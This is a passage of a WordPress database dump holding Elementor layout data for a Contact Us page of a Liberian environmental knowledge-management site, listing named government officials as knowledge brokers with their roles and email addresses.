_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58adbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(21840,3164,'_elementor_edit_mode','builder'),(21841,3164,'_elementor_template_type','wp-page'),(21842,3164,'_elementor_version','2.8.1'),(21843,3164,'_wp_page_template','default'),(21844,3164,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<